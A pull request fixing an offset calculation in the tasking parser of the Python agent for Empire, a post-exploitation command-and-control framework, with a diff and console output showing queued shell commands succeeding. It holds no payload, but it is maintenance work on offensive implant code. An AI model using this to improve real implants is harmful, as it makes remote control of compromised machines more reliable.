### PR TITLE
fix bug in calculation of packet offset in python agent

### DIFF
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -202,7 +202,7 @@ def process_tasking(data):
         if result:
             resultPackets += result
 
-        packetOffset = 8 + length
+        packetOffset = 12 + length
 
         while remainingData and remainingData != '':
             (packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset)
@@ -210,7 +210,7 @@ def process_tasking(data):
             if result:
                 resultPackets += result
 
-            packetOffset += 8 + length
+            packetOffset += 12 + length
         
         # send_message() is patched in from the listener module
         send_message(resultPackets)


### PR DESCRIPTION
Ok.  Let's try this again - 1 change / bug fix per request.

Python Empire agent has a bug in how it calculates packet offsets.  The length field is not included in the equation.  This results in a 4 byte overlap and a failure in the process_packet method of agent.py if multiple commands are entered over the duration of one beacon.

**Prior behavior:**
(Empire: LXF5HAKU) > sleep 30
delay/jitter set to 30/0.0
(Empire: LXF5HAKU) > shell ls
(Empire: LXF5HAKU) > shell uname
<command fails> internally a processTasking exception is thrown if the line is uncommented.

**New behavior: (after change)**
(Empire: LXF5HAKU) > sleep 30
delay/jitter set to 30/0.0
(Empire: LXF5HAKU) > shell ls
(Empire: LXF5HAKU) > shell uname
(Empire: LXF5HAKU) >
Desktop
Documents
Downloads
Music
Pictures
Public
src
Templates
Videos

 ..Command execution completed.
Linux

 ..Command execution completed.